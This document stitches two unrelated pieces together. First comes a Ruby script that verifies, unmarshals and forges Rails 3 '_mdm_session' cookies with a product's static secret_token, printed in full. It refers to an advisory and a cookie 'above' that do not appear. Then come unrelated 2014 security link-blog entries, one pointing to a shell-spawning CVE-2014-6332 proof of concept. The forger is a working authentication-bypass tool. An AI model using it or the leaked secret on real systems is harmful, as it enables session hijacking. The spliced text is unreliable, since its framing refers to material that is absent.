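The cookie construction the advisory reverse-engineers with `ruby -e` and `openssl dgst`, as an added Ruby example that is not part of the advisory or of the Metasploit module: verify the HMAC on the `_mdm_session` value above with the static secret_token, unmarshal it, and sign a session of one's own choosing. Data, HMAC and secret are the values printed in the advisory; the session `forge_cookie` signs is a benign Hash, not an RCE gadget, so the block only demonstrates that the server will accept whatever object the holder of the secret chooses to marshal.

```ruby
# Added example, not part of the advisory or of the Metasploit module:
# verify, decode and forge a Rails 3 signed session cookie with a known
# secret_token. Cookie data, HMAC and secret are the values the advisory prints.
require 'openssl'
require 'cgi'

# Static secret_token of the Enrollment and Apple iOS Management Extender (from the advisory)
SECRET = '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730' \
         'd11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365'

# Base64 part of the _mdm_session cookie shown in the advisory (Marshal.dump of the session Hash)
DATA_B64 = 'BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZj' \
           'YTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiM' \
           'TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg=='

# The Set-Cookie header as the server sent it: value URL-encoded, HMAC appended after "--"
SET_COOKIE = "_mdm_session=#{CGI.escape(DATA_B64)}" \
             '--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly'

# Rails 3 MessageVerifier: hex HMAC-SHA1 over the Base64 text, keyed with secret_token
def rails_digest(secret, data)
  OpenSSL::HMAC.hexdigest('SHA1', secret, data)
end

# Constant-time comparison so the check itself does not leak the digest byte by byte
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Extract and URL-decode the raw "<base64>--<hmac>" value of `name` from a Set-Cookie header
def cookie_value(set_cookie_header, name)
  cookie_name, value = set_cookie_header.split(';', 2).first.split('=', 2)
  raise ArgumentError, "expected cookie #{name}, got #{cookie_name}" unless cookie_name.strip == name
  CGI.unescape(value.to_s)
end

# Returns the session Hash if the HMAC verifies, nil otherwise. Marshal.load is
# what Rails does at this point: whoever knows the secret decides what gets
# unmarshalled, which is the root cause described in the advisory.
def verify_and_load(secret, raw_cookie)
  data, digest = raw_cookie.split('--', 2)
  return nil if data.nil? || digest.nil?
  return nil unless secure_compare(rails_digest(secret, data), digest)
  Marshal.load(data.unpack('m0')[0])
end

# Build a cookie the application will accept: any object, marshalled, Base64'd, signed
def forge_cookie(secret, session)
  data = [Marshal.dump(session)].pack('m0')
  "#{data}--#{rails_digest(secret, data)}"
end

if __FILE__ == $0
  raw = cookie_value(SET_COOKIE, '_mdm_session')
  p verify_and_load(SECRET, raw)                       # the server's own session Hash
  forged = forge_cookie(SECRET, { 'session_id' => 'attacker-chosen', 'user_id' => 1 })
  p verify_and_load(SECRET, forged)                    # accepted as if the server had issued it
  puts "Cookie: _mdm_session=#{CGI.escape(forged)}"    # header form to send back
end
```

The HMAC is computed over the Base64 text after URL-decoding (the `%3D%3D` in the header is `==` on the wire to the verifier), which is why the advisory's `openssl dgst` run feeds the padded Base64 string rather than the raw header value. Because the digest covers only the Base64 text, a different secret or a single altered character in the data makes `verify_and_load` return nil before anything is unmarshalled; the defect in the product is not the verifier but the secret being the same on every installation.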
December 2, 2014, 9:45 am
I was reading the blog at beyondtrust and decided to check if Journal was really an easy target.
Behold, multiple exploitable-looking crashes in a couple of minutes of mutation!
more here........http://pastebin.com/8Q9kkcwc
December 2, 2014, 9:47 am
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
here.........https://gist.github.com/worawit/84ab41358b8465966224
December 2, 2014, 9:49 am
A new global cyber power has emerged; one that has already compromised some of the world’s most critical infrastructure. The Operation Cleaver report sheds light on the efforts of a coordinated and determined group working to undermine the security of at least 50 companies across 15 industries in 16 countries. Our report unveils the tactics, techniques and procedures used in what is still an ongoing campaign.
more here.........http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf
December 2, 2014, 2:44 pm
The ELK stack is a set of analytics tools. Its initials represent Elasticsearch, Logstash and Kibana. Elasticsearch is a flexible and powerful open source, distributed, real-time search and analytics engine. Logstash is a tool for receiving, processing and outputting logs, like system logs, webserver logs, error logs, application logs and many more. Kibana is an open source (Apache-licensed), browser-based analytics and search dashboard for Elasticsearch.
more here.........http://blogs.cisco.com/security/step-by-step-setup-of-elk-for-netflow-analytics